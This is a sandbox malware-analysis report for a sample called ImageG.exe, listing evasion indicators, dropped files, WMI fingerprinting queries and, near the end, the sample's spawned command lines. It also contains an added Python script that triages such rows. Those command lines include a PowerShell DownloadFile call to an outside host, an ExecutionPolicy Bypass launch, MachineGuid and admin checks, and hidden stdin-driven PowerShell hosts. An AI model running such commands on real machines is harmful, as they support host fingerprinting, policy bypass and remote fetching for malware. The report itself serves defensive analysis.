Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8719
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3254
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 467
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6630
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4776
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4093
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4110
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6162
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3834
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5476
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3045
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6305
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7050
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 489
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9545
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ImageG.exe
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db804694-6538-41b3-8e68-e762db905f28.tmp.node
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\76aeac75-a5b5-4872-b3c5-27d2191829fa.tmp.node
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\797897d5-a581-42d8-bf0e-306300e4549c.tmp.node
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db715fb8-1e47-440d-93b6-4939c549fe98.tmp.node
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\nsis7z.dll
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2676205f-d0b6-44b9-8574-4cede5e50ea9.tmp.node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500 | Thread sleep count: 9808 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep count: 91 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 | Thread sleep count: 8697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748 | Thread sleep count: 1088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936 | Thread sleep count: 8874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936 | Thread sleep count: 971 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1956 | Thread sleep count: 8947 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1956 | Thread sleep count: 833 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884 | Thread sleep count: 8222 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644 | Thread sleep count: 1597 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572 | Thread sleep count: 9529 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 | Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 | Thread sleep count: 9355 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 | Thread sleep count: 374 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892 | Thread sleep count: 1149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 592 | Thread sleep count: 8570 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988 | Thread sleep count: 9430 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020 | Thread sleep count: 342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212 | Thread sleep count: 9304 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216 | Thread sleep count: 488 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 | Thread sleep count: 8450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400 | Thread sleep count: 1311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556 | Thread sleep count: 9262 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556 | Thread sleep count: 512 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 | Thread sleep count: 1587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 | Thread sleep count: 8203 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852 | Thread sleep count: 8719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856 | Thread sleep count: 1136 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9784 | Thread sleep count: 9322 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9780 | Thread sleep count: 467 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920 | Thread sleep count: 8538 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908 | Thread sleep count: 1276 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10040 | Thread sleep count: 7618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10040 | Thread sleep count: 2088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10168 | Thread sleep count: 6629 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10172 | Thread sleep count: 2948 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4264 | Thread sleep count: 6630 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4264 | Thread sleep count: 2956 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436 | Thread sleep count: 4513 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436 | Thread sleep count: 4776 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512 | Thread sleep count: 5944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512 | Thread sleep count: 3581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952 | Thread sleep count: 5077 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956 | Thread sleep count: 4093 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444 | Thread sleep count: 4110 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448 | Thread sleep count: 5258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 3406 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 6162 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680 | Thread sleep count: 3834 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680 | Thread sleep count: 5476 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 | Thread sleep count: 3045 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 | Thread sleep count: 6305 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 | Thread sleep count: 2444 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 | Thread sleep count: 7050 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9536 | Thread sleep count: 8860 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9876 | Thread sleep count: 995 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908 | Thread sleep count: 9350 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908 | Thread sleep count: 489 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9748 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9860 | Thread sleep count: 9545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9860 | Thread sleep count: 265 > 30
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\reg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\ImageG.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\resources
Source: powershell.exe, 0000001B.00000002.75862419940.0000016F5333B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: hgFSo
Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: hGfSo
Source: powershell.exe, 0000001B.00000002.75862419940.0000016F53589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: HGfSo
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
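Added example, not part of the Joe Sandbox report or of the sample's own code: a small Python triage pass over rows of the kind listed in this section. It assumes the rows are laid out as "Source: <process> | <event>", embeds ten of them copied from the rows above, and reduces them to the two indicator families the section is built from: WMI queries against classes commonly used to fingerprint virtual machines (Win32_PhysicalMemory, Win32_LogicalDisk, Win32_ComputerSystem here; Win32_BIOS and Win32_DiskDrive are added in the class table and were not queried in this report) and threads that sleep thousands of times. One caveat the code encodes: 922337203685477 is not a chosen sleep length. It is 0x8000000000000000 divided by 10,000, i.e. the relative-interval encoding of an INFINITE delay as it reaches NtDelayExecution, converted from 100 ns units to milliseconds, so those rows are threads parked indefinitely (consistent with the `-NoExit -Command -` PowerShell hosts listed in the next section waiting on stdin) and are reported as a note rather than as an evasion reason. The threshold values (two fingerprint classes, 1000 sleeps in one thread) are assumptions for the example.

```python
"""Triage sandbox-evasion rows of a Joe Sandbox style report (added example, not from the report)."""
import re
from collections import Counter
from dataclasses import dataclass

# Rows copied from the report section above; the " | " column separator is assumed.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk",
    r"Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500 | Thread sleep count: 9808 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 | Thread sleep count: 91 > 30",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9748 | Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\reg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem",
    r"Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug",
]

ROW_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<event>.+?)\s*$")
SRC_RE = re.compile(r"^(?P<image>.+?\.exe)(?: TID: (?P<tid>\d+))?$", re.IGNORECASE)
WMI_RE = re.compile(
    r"WMI Queries: IWbemServices::(?P<method>\w+) - (?P<ns>[^:]+?)\s*:\s*"
    r"(?:select \* from )?(?P<cls>\w+)", re.IGNORECASE)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count: (?P<count>\d+) > (?P<threshold>\d+)")
DELAY_RE = re.compile(r"(?:delay time: |Thread sleep time: -)(?P<value>\d+)")

# 0x8000000000000000 is how an INFINITE relative delay is encoded at the NtDelayExecution
# level; in 100 ns units divided by 10,000 it is the 922337203685477 shown in the report.
INFINITE_DELAY = 0x8000000000000000 // 10_000

# WMI classes commonly used for VM/sandbox fingerprinting. The first three are queried in
# this report; Win32_BIOS and Win32_DiskDrive are added here and were not queried.
VM_FINGERPRINT_CLASSES = {
    "win32_physicalmemory": "RAM modules/size (one small DIMM suggests a VM)",
    "win32_logicaldisk": "disk count/size (a single tiny disk suggests a sandbox)",
    "win32_computersystem": "Manufacturer/Model (VMware, VirtualBox, QEMU strings)",
    "win32_bios": "BIOS vendor/serial strings",
    "win32_diskdrive": "disk model strings",
}


@dataclass
class Finding:
    kind: str    # wmi_fingerprint | sleep_loop | infinite_wait | long_delay | debug_privilege
    image: str   # lower-case image name of the process that produced the row
    detail: str
    value: int = 0


def parse_row(line):
    """Split one report row into (image, tid, event); None for rows of another shape."""
    m = ROW_RE.match(line)
    if not m:
        return None
    src = SRC_RE.match(m["source"])
    image = (src["image"] if src else m["source"]).rsplit("\\", 1)[-1].lower()
    tid = int(src["tid"]) if src and src["tid"] else None
    return image, tid, m["event"]


def triage(lines):
    """Turn report rows into evasion findings; rows that are not indicators are skipped."""
    findings = []
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            continue
        image, tid, event = parsed
        where = f"TID {tid if tid is not None else '?'}"
        if (w := WMI_RE.search(event)):
            if w["cls"].lower() in VM_FINGERPRINT_CLASSES:
                findings.append(Finding("wmi_fingerprint", image, w["cls"]))
        elif (s := SLEEP_COUNT_RE.search(event)):
            findings.append(Finding("sleep_loop", image, where, int(s["count"])))
        elif (d := DELAY_RE.search(event)):
            value = int(d["value"])
            kind = "infinite_wait" if value >= INFINITE_DELAY else "long_delay"
            findings.append(Finding(kind, image, where, value))
        elif event.startswith("Process token adjusted: Debug"):
            findings.append(Finding("debug_privilege", image, "SeDebugPrivilege enabled"))
    return findings


def count_kinds(findings):
    return dict(Counter(f.kind for f in findings))


def evasion_verdict(findings):
    """Reduce findings to reasons an analyst would accept, plus informational notes."""
    kinds = count_kinds(findings)
    classes = sorted({f.detail.lower() for f in findings if f.kind == "wmi_fingerprint"})
    busiest = max((f.value for f in findings if f.kind == "sleep_loop"), default=0)
    reasons, notes = [], []
    if len(classes) >= 2:
        reasons.append("VM-fingerprint WMI classes queried: " + ", ".join(classes))
    if busiest >= 1000:
        reasons.append(f"a single thread slept {busiest} times (timing-based stalling)")
    if kinds.get("infinite_wait"):
        notes.append(f"{kinds['infinite_wait']} INFINITE wait(s): a parked host thread, "
                     "not a deliberate timed sleep")
    if kinds.get("debug_privilege"):
        notes.append(f"SeDebugPrivilege enabled in {kinds['debug_privilege']} process(es); "
                     "powershell.exe does this routinely, weak on its own")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "notes": notes, "counts": kinds}


if __name__ == "__main__":
    for key, val in evasion_verdict(triage(SAMPLE_LINES)).items():
        print(f"{key}: {val}")
```

On the sample rows the verdict is "suspicious" on two grounds (three fingerprint classes from two different images, and a thread with 9808 sleeps), while the two infinite waits and the token adjustment are carried only as notes. Rows the parser does not recognise, such as the keyboard-layout key open, are skipped rather than guessed at.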

        HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_5600.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 4416, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
